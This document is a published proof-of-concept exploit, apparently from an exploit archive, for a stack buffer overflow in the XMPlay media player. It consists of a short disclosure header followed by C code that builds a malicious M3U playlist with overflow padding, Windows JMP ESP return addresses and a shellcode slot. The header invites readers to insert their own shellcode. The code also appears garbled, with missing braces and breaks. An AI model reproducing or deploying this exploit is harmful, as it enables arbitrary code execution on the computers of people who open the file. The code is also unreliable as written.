XMPlay version .M3U filename local buffer overflow exploit that executes CALC.exe.
0-day XMPlay .M3U Filename Buffer Overflow Exploit
XMPlay and lower experiance a stack-based buffer overflow when
loading malformed M3U files (probably PLS and ASX files as well).
This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)
Either the DisplayName field of the M3U or the FileName field can be
used to exploit the system, but during my tests, using the DisplayName
field caused Windows DEP to activate. (English Windows XP SP2)
Huge Greets and Thanks to Expanders (expanders[at]gmail[dot]com)
Who I presented the PoC and Discovery to, and he wrote the first PoC
Exploit for it. And Jerome Athias for some neat tools. Both of these
guys are very talented, keep up the good work.
Someone should try this with ASX and PLS files, i bet it works as well.
Reported Exploit Date: 11/20/2006
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
FILE * Exploit;
char buffer[512];
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
unsigned char scode[] =
char NOPSled[20];
char tail[] = ".mid\r\n";
char Overflow[5000];
int i, JMP;
printf("XMPlay and prior M3U Filename Buffer Overflow Exploit\n");
printf("Discovered By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
printf("Original PoC coded by: Expanders <expanders[at]gmail[dot]com>\n\n");
printf("Usage: %s, <output M3U file> <JMP> [M3U Display Name]\n", argv[0]);
printf("\n JMP Options\n");
printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n");
printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n");
printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n");
printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256>\n");
if (argc < 2) {
printf("Invalid Number Of Arguments\n");
return 1;
Exploit = fopen(argv[1],"w");
if ( !Exploit )
printf("\nCouldn't Open File!");
return 1;
memset(Overflow, 0, 5000);
memset(buffer, 0, 505);
memset(NOPSled, 0, 20);
fputs("#EXTM3U\r\n", Exploit);
if (strlen(argv[3]) > 0) {
fputs("#EXTINF:0,", Exploit);
fputs(argv[3], Exploit);
fputs("\r\n", Exploit);
} else {
fputs("#EXTINF:0,XMPlay_0-Day_Buffer_Overflow_Exploit_By_Greg_Linares_and_Expanders\r\n", Exploit);
fputs("C:\\", Exploit);
for (i=0;i<505;i++) {
strcat(buffer, "A");
fputs(buffer, Exploit);
if (atoi(argv[2]) <= 0) {
JMP = 1;
} else if (atoi(argv[2]) > 4) {
JMP = 1;
} else {
JMP = atoi(argv[2]);
switch(JMP) {
case 1:
printf("Using English Windows XP SP2 JMP...\n");
fputs("\xbc\x41\xdb\x77", Exploit);
case 2:
printf("Using English Windows XP SP1 JMP...\n");
fputs("\xfc\x18\xd7\x77", Exploit);
case 3:
printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
fputs("\xdc\x4a\xd7\x77", Exploit);
case 4:
printf("Using English Windows 2000 SP 4 JMP...\n");
fputs("\x56\xc2\xe3\x77", Exploit);
fputs(scode, Exploit);
for (i=0;i<20;i++) {
strcat(NOPSled, "\x90");
fputs(NOPSled, Exploit);
fputs(tail, Exploit);
printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);
printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
printf("Greetz to: Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
return 0;